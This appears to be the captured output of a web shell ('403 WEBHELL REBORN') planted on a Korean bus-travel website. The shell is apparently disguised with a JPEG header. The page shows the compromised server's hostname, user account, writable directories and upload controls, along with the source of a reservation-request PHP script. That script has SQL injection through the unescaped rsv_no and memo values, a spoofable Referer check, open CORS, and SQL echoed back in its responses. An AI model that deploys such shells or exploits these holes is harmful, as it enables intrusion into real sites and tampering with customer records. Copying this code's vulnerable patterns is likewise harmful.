ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/toadmin/ajaxDataForZipline/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/toadmin/ajaxDataForZipline/receiveResRequest.php
<?php
header('Access-Control-Allow-Origin: *');
header("Access-Control-Allow-Headers: *");
header("Access-Control-Allow-Methods: *");

if(strpos($_SERVER['HTTP_REFERER'],"zipline.co.kr") !== false || strpos($_SERVER['HTTP_REFERER'],"zipline.tkplace.co.kr") !== false) {

	$getData = json_encode($_GET);

	$request_text = urldecode($_GET['request_text']); //request_text":"%EC%88%98%EC%A0%95%EC%9A%94%EC%B2%AD%EB%93%9C%EB%A6%BD%EB%8B%88%EB%8B%A4.%0ADATA",
	$res_name = urldecode($_GET['res_name']); //%EC%9D%B4%EA%B0%95%EC%B2%A0
	$zipline_requester = $_GET['zipline_requester']; //"zipline_requester":"tktravel"
	$rsv_no = $_GET['rsv_no'];
	$res_branch = $_GET['res_branch'];
	$res_time = $_GET['res_time'];
	$res_phone = $_GET['res_phone'];

//		include $_SERVER['DOCUMENT_ROOT'] . "/Lib/config.php";
//		include $_SERVER['DOCUMENT_ROOT'] . "/Lib/common.lib.php";
//		include $_SERVER['DOCUMENT_ROOT'] . "/Lib/connect.php";

	include $_SERVER['DOCUMENT_ROOT'].'/seo/dbConnectDesune.php';

	$res_name = $db_connect->escape_string($res_name);
	$res_phone = $db_connect->escape_string($res_phone);
	$res_branch = $db_connect->escape_string($res_branch);
	$res_time = $db_connect->escape_string($res_time);
	$zipline_requester = $db_connect->escape_string($zipline_requester);
	$request_text = $db_connect->escape_string($request_text);

	$sql = "INSERT INTO zipline_res_modify_request SET rsv_no = '{$rsv_no}'";
	$sql .= ", res_name = '{$res_name}'";
	$sql .= ", res_phone = '{$res_phone}'";
	$sql .= ", branch = '{$res_branch}'";
	$sql .= ", res_time = '{$res_time}'";
	$sql .= ", zipline_requester = '{$zipline_requester}'";
	$sql .= ", request_txt = '{$request_text}'";
	$sql .= ", ins_dt = now()";

	$isResult = false;

	if ($db_connect->query($sql)) {
		$isResult = true;

		//변경사항요청 메모에 저장
		$sql = "SELECT g_memo FROM TB_RES_GOOD WHERE rsv_no = '{$rsv_no}'";
		$resData = $db_connect->query($sql);
		$resData = $resData->fetch_array(MYSQLI_ASSOC);

		$gMemo = $resData['g_memo'];

		$gMemo = $request_text.'\n'.$gMemo;

		$sql = "UPDATE TB_RES_GOOD SET g_memo = '{$gMemo}' WHERE rsv_no = '{$rsv_no}'";
		$db_connect->query($sql);
	}

	echo json_encode(
		array(
			'result' => $isResult,
			'errMsg' => 'dev error',
			'sql' => $sql,
		)
	);
}else{
	echo json_encode(
		array(
			'result' => false,
			'errMsg' => 'zipline.co.kr에서 변경해주세요. 그 외 URL에서는 접속이 불가합니다.',
		)
	);
}
exit;
?>

Anon7 - 2021